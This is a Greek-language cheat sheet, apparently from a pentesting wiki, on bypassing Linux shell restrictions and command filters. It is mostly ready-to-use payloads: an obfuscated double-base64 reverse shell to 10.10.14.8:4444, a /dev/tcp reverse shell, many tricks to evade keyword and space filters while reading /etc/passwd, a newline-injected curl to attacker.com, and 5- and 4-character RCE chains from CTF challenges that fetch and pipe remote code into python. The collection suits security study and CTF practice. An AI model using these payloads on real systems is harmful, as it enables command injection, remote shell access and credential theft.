Χρησιμοποιήστε Trickest για να δημιουργήσετε εύκολα και να αυτοματοποιήσετε ροές εργασίας που υποστηρίζονται από τα πιο προηγμένα εργαλεία της κοινότητας.
Αποκτήστε πρόσβαση σήμερα:
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the timeecho"echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' |base64|base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h"|sed's/ /${IFS}/g'# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
Σύντομο Rev shell
#Trick from Dikline#Get a rev shell with(sh)0>/dev/tcp/10.10.10.10/443#Then get the out of the rev shell executing inside of it:exec>&0
Παράκαμψη Διαδρομών και απαγορευμένων λέξεων
# Question mark binary substitution/usr/bin/p?ng# /usr/bin/pingnma?-p80localhost# /usr/bin/nmap -p 80 localhost# Wildcard(*) binary substitution/usr/bin/who*mi# /usr/bin/whoami# Wildcard + local directory argumentstouch---la# -- stops processing options after the --ls*echo*#List current files and folders with echo and wildcard# [chars]/usr/bin/n[c]# /usr/bin/nc# Quotes'p'i'n'g# ping"w"h"o"a"m"i# whoamiech''otest# echo testech""otest# echo testbas''e64# base64#Backslashes\u\n\a\m\e \-\a # uname -a/\b\i\n/////s\h# $@who$@ami#whoami# Transformations (case, reverse, base64)$(tr"[A-Z]""[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case$(a="WhOaMi";printf%s"${a,,}") #whoami -> transformation (only bash)$(rev<<<'imaohw') #whoamibash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64# Execution through $0echowhoami|$0# Uninitialized variables: A uninitialized variable equals to null (nothing)cat$u/etc$u/passwd$u # Use the uninitialized variable without {} before any symbolp${u}i${u}n${u}g# Equals to ping, use {} to put the uninitialized variables between valid characters# New linesp\i\n\g # These 4 lines will equal to ping# Fake commandsp$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shownw`u`h`u`o`u`a`u`m`u`i# Equals to whoami but 5 errors trying to execute "u" are shown# Concatenation of strings using history!-1# This will be substitute by the last command executed, and !-2 by the penultimate commandmi# This will throw an errorwhoa# This will throw an error!-1!-2# This will execute whoami
Παράκαμψη απαγορευμένων χώρων
# {form}{cat,lol.txt} # cat lol.txt{echo,test} # echo test# IFS - Internal field separator, change " " for any other character ("]" in this case)cat${IFS}/etc/passwd# cat /etc/passwdcat$IFS/etc/passwd# cat /etc/passwd# Put the command line in a variable and then execute itIFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$bIFS=];b=cat]/etc/passwd;$b # Using 2 ";"IFS=,;`cat<<<cat,/etc/passwd`# Using cat twice# Other way, just change each space for ${IFS}echo${IFS}test# Using hex formatX=$'cat\x20/etc/passwd'&&$X# Using tabsecho"ls\x09-l"|bash# Undefined variables and !$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefineduname!-1\-a# This equals to uname -a
Παράκαμψη της αντίστροφης και της κανονικής κάθετης γραμμής
Μπορείτε να χρησιμοποιήσετε το burpcollab ή το pingb για παράδειγμα.
Builtins
Σε περίπτωση που δεν μπορείτε να εκτελέσετε εξωτερικές συναρτήσεις και έχετε πρόσβαση μόνο σε ένα περιορισμένο σύνολο builtins για να αποκτήσετε RCE, υπάρχουν μερικά χρήσιμα κόλπα για να το κάνετε. Συνήθως δεν θα μπορείτε να χρησιμοποιήσετε όλα τα builtins, οπότε θα πρέπει να γνωρίζετε όλες τις επιλογές σας για να προσπαθήσετε να παρακάμψετε τη φυλακή. Ιδέα από devploit.
Πρώτα απ' όλα, ελέγξτε όλα τα shell builtins. Στη συνέχεια, εδώ έχετε μερικές συστάσεις:
# Get list of builtinsdeclare builtins# In these cases PATH won't be set, so you can try to set itPATH="/bin"/bin/lsexport PATH="/bin"declare PATH="/bin"SHELL=/bin/bash# Hex$(echo-e"\x2f\x62\x69\x6e\x2f\x6c\x73")$(echo-e"\x2f\x62\x69\x6e\x2f\x6c\x73")# Inputreadaaa; exec $aaa #Read more commands to execute and execute themreadaaa; eval $aaa# Get "/" char using printf and env varsprintf%.1s"$PWD"## Execute /bin/ls$(printf%.1s"$PWD")bin$(printf%.1s"$PWD")ls## To get several letters you can use a combination of printf anddeclaredeclare functionsdeclare historywords# Read flag in current dirsourcef*flag.txt:1:commandnotfound:CTF{asdasdasd}# Read file with readwhileread-rline; doecho $line; done< /etc/passwd# Get env variablesdeclare# Get historyhistorydeclare historydeclare historywords# Disable special builtins chars so you can abuse them as scripts[ #[: ']' expected## Disable "[" as builtin and enable it as scriptenable -n [echo -e'#!/bin/bash\necho "hello!"'> /tmp/[chmod +x [export PATH=/tmp:$PATHif [ "a" ]; then echo 1; fi# Will print hello!
# A regex that only allow letters and numbers might be vulnerable to new line characters1%0a`curlhttp://attacker.com`
Bashfuscator
# From https://github.com/Bashfuscator/Bashfuscator./bashfuscator-c'cat /etc/passwd'
RCE με 5 χαρακτήρες
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge#Oragnge Tsai solution## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration datehttp://host/?cmd=>ls\http://host/?cmd=ls>_http://host/?cmd=>\ \http://host/?cmd=>-t\http://host/?cmd=>\>ghttp://host/?cmd=ls>>_## Step2: generate `curl orange.tw|python` to file "g"## by creating the necesary filenames and writting that content to file "g" executing the previous generated filehttp://host/?cmd=>onhttp://host/?cmd=>th\http://host/?cmd=>py\http://host/?cmd=>\|\http://host/?cmd=>tw\http://host/?cmd=>e.\http://host/?cmd=>ng\http://host/?cmd=>ra\http://host/?cmd=>o\http://host/?cmd=>\ \http://host/?cmd=>rl\http://host/?cmd=>cu\http://host/?cmd=sh _# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file## Finally execute the file "g"http://host/?cmd=shg# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/## Execute tar command over a folderhttp://52.199.204.34/?cmd=>tarhttp://52.199.204.34/?cmd=>zcfhttp://52.199.204.34/?cmd=>zzzhttp://52.199.204.34/?cmd=*%20/h*# Another curiosity if you can read files of the current folderln/f*## If there is a file /flag.txt that will create a hard link## to it in the current folder
RCE με 4 χαρακτήρες
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands# it will follow the same principle of creating the command `ls -t>g` in a file# and then generate the full command in filenames# generate "g> ht- sl" to file "v"'>dir''>sl''>g\>''>ht-''*>v'# reverse file "v" to file "x", content "ls -th >g"'>rev''*v>x'# generate "curl orange.tw|python;"'>\;\\''>on\\''>th\\''>py\\''>\|\\''>tw\\''>e.\\''>ng\\''>ra\\''>o\\''>\ \\''>rl\\''>cu\\'# got shell'sh x''sh g'
Read-Only/Noexec/Distroless Bypass
Αν βρίσκεστε μέσα σε ένα σύστημα αρχείων με τις προστασίες read-only και noexec ή ακόμα και σε ένα distroless container, υπάρχουν ακόμα τρόποι να εκτελέσετε αυθαίρετους δυαδικούς κωδικούς, ακόμα και ένα shell!:
Χρησιμοποιήστε Trickest για να δημιουργήσετε και να αυτοματοποιήσετε ροές εργασίας που υποστηρίζονται από τα πιο προηγμένα εργαλεία της κοινότητας.
Αποκτήστε πρόσβαση σήμερα: